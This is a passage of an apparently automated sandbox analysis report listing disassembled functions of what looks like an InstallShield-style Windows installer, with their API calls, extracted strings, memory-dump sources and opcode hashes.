                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_StringVariant$ChangeClearType_memset
                                                                                                                                                                          • String ID: HsG$Version
                                                                                                                                                                          • API String ID: 751381712-812662942
                                                                                                                                                                          • Opcode ID: fd2462aab33620e3494a149f507e5cc0015ab673c532163865a763c619efff3b
                                                                                                                                                                          • Instruction ID: d5247dfb82dfac2e0cba8f72930b02dc08d244023f8943c55c41bf66034df27b
                                                                                                                                                                          • Opcode Fuzzy Hash: fd2462aab33620e3494a149f507e5cc0015ab673c532163865a763c619efff3b
                                                                                                                                                                          • Instruction Fuzzy Hash: A2518070905218AEDB60DB60CC99BDEB7B8AF14304F5001EAA10DB71D1EB785F88CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00406150, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406350: SysAllocStringLen.OLEAUT32(00000000,?), ref: 00406399
                                                                                                                                                                            • Part of subcall function 00406350: _memmove.LIBCMT ref: 004063C1
                                                                                                                                                                            • Part of subcall function 00406350: SysFreeString.OLEAUT32(00000000), ref: 004063D1
                                                                                                                                                                          • _memmove.LIBCMT ref: 00406205
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String_memmove$AllocFree
                                                                                                                                                                          • String ID: HsG$invalid string position$string too long
                                                                                                                                                                          • API String ID: 105348488-4059347116
                                                                                                                                                                          • Opcode ID: b06d3ec4792a8a70b45f05350074a3fa66d35ebd0bc6f41ad112a431ba622d2d
                                                                                                                                                                          • Instruction ID: b6540d861efc792820843319168a3ae34e3a809f59c9f477f0ab1d6f2e1bb576
                                                                                                                                                                          • Opcode Fuzzy Hash: b06d3ec4792a8a70b45f05350074a3fa66d35ebd0bc6f41ad112a431ba622d2d
                                                                                                                                                                          • Instruction Fuzzy Hash: 3031E2323043149BC724EEACE88081AB3EAEFD57143214A7FE513DB291DB35E955C7A9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00411C3E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00411C48
                                                                                                                                                                            • Part of subcall function 00411FFD: __EH_prolog3_GS.LIBCMT ref: 00412004
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: MsiVersion
                                                                                                                                                                          • API String ID: 2427045233-1669961159
                                                                                                                                                                          • Opcode ID: 8a7472359058eba9b14699442dd69798f1fc4de84322e3eecac7ed08f4a41a95
                                                                                                                                                                          • Instruction ID: eb2aa746a39e8e660e2debb9262a4bd86d39c325c9c6ec037d28a9dd444163f4
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a7472359058eba9b14699442dd69798f1fc4de84322e3eecac7ed08f4a41a95
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C317971A00318EFDF14DBA4DC85BDD7379AF45304F1040ABE609AB192EB789E85CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00458F9C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00458FA3
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00401410: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
                                                                                                                                                                            • Part of subcall function 00401410: RegCloseKey.ADVAPI32(00000000), ref: 00401497
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000008,00000000,?,0000005C,0041CC00,?,-80000001,?,?), ref: 00459018
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                            • Part of subcall function 00454E0F: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,?,0045905C,00000000,?,?,?,?), ref: 00454E30
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_QueryStringValue$AllocCloseH_prolog3HandleModule
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2251186408-815662401
                                                                                                                                                                          • Opcode ID: dae28259d520293968fb04570947654750b5514f700a05bdd20f4997be0e20d0
                                                                                                                                                                          • Instruction ID: b37b129affbe31bd5429d2c9211d6256549548be9fb3c8ec7d67064aba96ee76
                                                                                                                                                                          • Opcode Fuzzy Hash: dae28259d520293968fb04570947654750b5514f700a05bdd20f4997be0e20d0
                                                                                                                                                                          • Instruction Fuzzy Hash: E2311671800259DFCF15DF95C9919EEBBB8BF14348F50402EE905BB291EB74AA09CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004169E1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: SeA
                                                                                                                                                                          • API String ID: 0-2297079583
                                                                                                                                                                          • Opcode ID: 9a014435fb7a29ee1691ccc022ab4662ecfc57e1d601f5aeffa1b74c7e6fb053
                                                                                                                                                                          • Instruction ID: ecded04f1a918b666fb72c1e185211a9d048ff3ae9e53ee7ef177626206b62fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a014435fb7a29ee1691ccc022ab4662ecfc57e1d601f5aeffa1b74c7e6fb053
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A315271A00615AFCF14DF78C88499E77B9FF45354B12862AEC15A3250E774ED90CBD8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00455907, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00455911
                                                                                                                                                                            • Part of subcall function 00433743: __EH_prolog3.LIBCMT ref: 0043374A
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00438C80: __EH_prolog3.LIBCMT ref: 00438C87
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 004339BD: __EH_prolog3.LIBCMT ref: 004339C4
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 004559D0
                                                                                                                                                                            • Part of subcall function 00442782: RaiseException.KERNEL32(?,?,00441450,00000000,?,?,?,?,00441450,00000000,00497AC0,?), ref: 004427D3
                                                                                                                                                                            • Part of subcall function 00433CE5: __EH_prolog3.LIBCMT ref: 00433CEC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3$ErrorLast$FreeString$ExceptionException@8H_prolog3_catch_RaiseThrow
                                                                                                                                                                          • String ID: $HsG
                                                                                                                                                                          • API String ID: 1995314774-3130049038
                                                                                                                                                                          • Opcode ID: 8132b7a09b97fe9a14408be9764c7954bd20cce4f3f6870cea61f619272fd66b
                                                                                                                                                                          • Instruction ID: ace026071d227fde7325aab07702da409128d818eb9189e1942154cbed421e47
                                                                                                                                                                          • Opcode Fuzzy Hash: 8132b7a09b97fe9a14408be9764c7954bd20cce4f3f6870cea61f619272fd66b
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A316071800258EADB10EFE0C895BED7B686F14308F54519FF80676283EBB85B4CDB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00438C80, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00438C87
                                                                                                                                                                            • Part of subcall function 0043892B: __EH_prolog3_GS.LIBCMT ref: 00438935
                                                                                                                                                                            • Part of subcall function 0043892B: InterlockedDecrement.KERNEL32(00000000), ref: 00438945
                                                                                                                                                                            • Part of subcall function 0043892B: CloseHandle.KERNEL32(000000FF), ref: 0043896D
                                                                                                                                                                            • Part of subcall function 0043892B: __CxxThrowException@8.LIBCMT ref: 004389A6
                                                                                                                                                                            • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
                                                                                                                                                                            • Part of subcall function 004432A1: std::exception::exception.LIBCMT ref: 004432D5
                                                                                                                                                                            • Part of subcall function 004432A1: __CxxThrowException@8.LIBCMT ref: 004432EA
                                                                                                                                                                          • GetLastError.KERNEL32(000000FF,00000000,80400100,?,00000000,0045611E,0047C4E4,80000000,00000001,00000080,00000003,00000000,00000000,?,00000000,00000084), ref: 00438D62
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Exception@8Throw$CloseDecrementErrorH_prolog3H_prolog3_HandleInterlockedLast_mallocstd::exception::exception
                                                                                                                                                                          • String ID: HsG$toys::file
                                                                                                                                                                          • API String ID: 2011250969-664232986
                                                                                                                                                                          • Opcode ID: 476c9e8b2e2575007c92ac349694369c87d6b1bfc873668b244331bd53e4beed
                                                                                                                                                                          • Instruction ID: 8bb4dd54a4404eafffcec503ecdd22372bce14b72131dd46fb4a5f3b3d68be9a
                                                                                                                                                                          • Opcode Fuzzy Hash: 476c9e8b2e2575007c92ac349694369c87d6b1bfc873668b244331bd53e4beed
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21E270600305AFDF14AF718881A6EB7A2AF58358F10942FF5169B2D2DF7CDD019B29
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004194A7, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004194B1
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000400,?,00000400), ref: 0041951B
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_String$H_prolog3$Free$AllocFileModuleName
                                                                                                                                                                          • String ID: HsG$ISSetup.dll
                                                                                                                                                                          • API String ID: 4249000290-2347869718
                                                                                                                                                                          • Opcode ID: e323ada1f3d8eeece09b36f658f68c50f8aa2246ef84f49a2be6745e8ffd3219
                                                                                                                                                                          • Instruction ID: 4e0496bd79c75e21839b58ea6c55a1a405bf68119e842e89425977022df559eb
                                                                                                                                                                          • Opcode Fuzzy Hash: e323ada1f3d8eeece09b36f658f68c50f8aa2246ef84f49a2be6745e8ffd3219
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A318F71800158EACB11EBA5CC95BDEBB78BF55304F4080AEE10AB71D2DB781B49CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043557B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 004355CB
                                                                                                                                                                            • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
                                                                                                                                                                          • wsprintfW.USER32 ref: 00435648
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3__memsetwsprintf
                                                                                                                                                                          • String ID: %s/%s$Location
                                                                                                                                                                          • API String ID: 2010508751-42320356
                                                                                                                                                                          • Opcode ID: 623eb78449de06c9fc923b3259e1353a90a62daa14e54a208505cf88229414fe
                                                                                                                                                                          • Instruction ID: 23866275a3071eba289bf9b220f73d8ac8661907e7f7e16146d8c925c51520d4
                                                                                                                                                                          • Opcode Fuzzy Hash: 623eb78449de06c9fc923b3259e1353a90a62daa14e54a208505cf88229414fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 20214172900218ABD710EB54CC45FEAB7BCFB08759F0045AEB519E3191EB78AB448B94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004563EA, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004563F1
                                                                                                                                                                            • Part of subcall function 0040F99A: __EH_prolog3_GS.LIBCMT ref: 0040F9A4
                                                                                                                                                                            • Part of subcall function 004331B2: __EH_prolog3_GS.LIBCMT ref: 004331B9
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 004589E8: __EH_prolog3_GS.LIBCMT ref: 004589EF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: .EXE$HsG$SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                                          • API String ID: 3033373895-1555161118
                                                                                                                                                                          • Opcode ID: b8efbc7d32b1d0c03c7422236b8a6e94af8016e4b88016080c3c99625493db37
                                                                                                                                                                          • Instruction ID: a9541f351755fa5af9082140158e7c384e609ca91e5a70eea092a6782f5e6089
                                                                                                                                                                          • Opcode Fuzzy Hash: b8efbc7d32b1d0c03c7422236b8a6e94af8016e4b88016080c3c99625493db37
                                                                                                                                                                          • Instruction Fuzzy Hash: D921B6B1801204BADB00FFA5C8535DE7B689F15358F50445FFC09AB292EB39460EC7D9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041E2C8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountH_prolog3_Tick
                                                                                                                                                                          • String ID: SplashTime$Startup
                                                                                                                                                                          • API String ID: 2349883465-926283664
                                                                                                                                                                          • Opcode ID: 278945ba514fa351542ebb51b170e1af732bfb0141513c739876c3e692eddbcc
                                                                                                                                                                          • Instruction ID: a642b54ca2eb9fae89e9f0954061d03fed2642df482e6e3707699119b450d2a8
